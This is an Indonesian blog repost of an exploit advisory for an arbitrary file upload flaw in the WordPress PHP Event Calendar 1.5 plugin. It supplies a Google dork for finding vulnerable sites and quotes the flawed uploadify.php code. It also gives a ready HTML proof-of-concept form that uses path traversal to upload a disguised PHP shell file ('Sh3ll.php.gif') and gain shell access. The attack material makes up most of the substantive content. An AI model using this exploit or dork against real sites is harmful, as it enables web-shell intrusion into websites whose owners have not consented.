Flash Go
» » » » WordPress PHP Event Calendar 1.5 Arbitrary File Upload

WordPress PHP Event Calendar 1.5 Arbitrary File Upload

WordPress PHP Event Calendar 1.5 Arbitrary File Upload - Hallo sahabat Minato ET, Pada Artikel yang anda baca kali ini dengan judul WordPress PHP Event Calendar 1.5 Arbitrary File Upload, kami telah mempersiapkan artikel ini dengan baik untuk anda baca dan ambil informasi didalamnya. mudah-mudahan isi postingan Artikel Aribitraty, Artikel Uploadify, Artikel Wordpress, yang kami tulis ini dapat anda pahami. baiklah, selamat membaca.

Judul : WordPress PHP Event Calendar 1.5 Arbitrary File Upload
link : WordPress PHP Event Calendar 1.5 Arbitrary File Upload

Baca juga


WordPress PHP Event Calendar 1.5 Arbitrary File Upload




#- Title: WordPress PHP Event Calendar Arbitrary File Upload
#- Author: CrashBandicot
#- Date: 04/02/2015
#- Vendor : phpeventcalendar. com
#- Developer : -
#- Link Download : Wordpress. org/plugins/php-event-calendar/
#- Google Dork: inurl:wp-content/plugins/php-event-calendar/
#- Tested on : MSwin
#- Fixed in Version : > 1.5
=======================================================================

 &- Vulnerability : /wp-content/plugins/php-event-calendar/server/classes/uploadify.php ( "Uploadify.php" )


Bug Code :

<?php


/*


Uploadify


Copyright (c) 2012 Reactive Apps, Ronnie Garcia


Released under the MIT License <http://www.opensource.org/licenses/mit-license.php>


*/


// Define a destination


//$targetFolder = '/uploads'; // Relative to the root


$targetFolder = $_POST['targetFolder']; // wp upload directory


$dir = str_replace('\\','/',dirname(__FILE__));


//$verifyToken = md5('unique_salt' . $_POST['timestamp']);


if (!empty($_FILES)) {


    $tempFile = $_FILES['Filedata']['tmp_name'];


    //$targetPath = $dir.$targetFolder;


    $targetPath = $targetFolder;


    $fileName = $_POST['user_id'].'_'.$_FILES['Filedata']['name'];


    $targetFile = rtrim($targetPath,'/') . '/' . $fileName;


    // Validate the file type


    $fileTypes = array('jpg','jpeg','gif','png'); // File extensions


    $fileParts = pathinfo($_FILES['Filedata']['name']);


    if (in_array($fileParts['extension'],$fileTypes)) {


        move_uploaded_file($tempFile,$targetFile);


        echo '1';


    } else {


        echo 'Invalid file type.';




    }




&- When Vulnerable : *Blank*

Proof Of Concept :

Material : Sh3ll.php.gif (if support) / Upload image.gif


HTML Code : 

<div><form action="http://3xploi7.com/wp-content/plugins/php-event-calendar/server/classes/uploadify.php"  method="post" enctype="multipart/form-data">
 <input type="file" name="Filedata" id="file" ><br>
 <input type="text" name="targetFolder" value="../../../../../" id="file" ><br>
 <input type="text" name="user_id" value="3xploi7" id="file" ><br>
 <input type="submit" name="submit" value="3xploi7ed !" >
</form></div>

Shell Acces ? Here




Demikianlah Artikel WordPress PHP Event Calendar 1.5 Arbitrary File Upload

Sekianlah artikel WordPress PHP Event Calendar 1.5 Arbitrary File Upload kali ini, mudah-mudahan bisa memberi manfaat untuk anda semua. baiklah, sampai jumpa di postingan artikel lainnya.

Anda sekarang membaca artikel WordPress PHP Event Calendar 1.5 Arbitrary File Upload dengan alamat link https://minatoet.blogspot.com/2015/11/wordpress-php-event-calendar-15.html

0 Response to "WordPress PHP Event Calendar 1.5 Arbitrary File Upload"

Post a Comment

Subscribe to: Post Comments (Atom)